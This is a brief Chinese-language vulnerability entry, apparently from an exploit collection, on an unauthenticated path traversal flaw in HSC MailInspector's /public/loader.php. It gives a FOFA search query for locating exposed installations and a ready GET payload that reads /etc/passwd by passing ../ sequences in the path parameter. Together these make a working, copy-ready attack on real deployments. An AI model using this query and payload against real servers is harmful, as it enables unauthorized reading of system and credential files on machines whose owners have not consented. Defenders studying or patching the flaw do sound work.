0x01 产品简介
HSC MailInspector是一款电子邮件检查工具,它能够扫描最新邮件,并允许用户远程执行各种操作,如浏览、垃圾邮件排除、编辑和删除。该工具还支持SSL安全机制、在线回信、新信通知、登入纪录和错误报告等功能。
0x02 漏洞概述
HSC MailInspector /public/loader.php文件中存在的路径遍历漏洞。未经身份验证的用户可以滥用/public/loader.php文件中存在的路径遍历漏洞。path参数无法正确筛选传递的文件和目录是否为webroot的一部分,从而使攻击者能够读取服务器上的任意文件。
0x03 测绘语句
fofa: "mailinspector/public"
0x04 漏洞复现
payload:GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd HTTP/1.1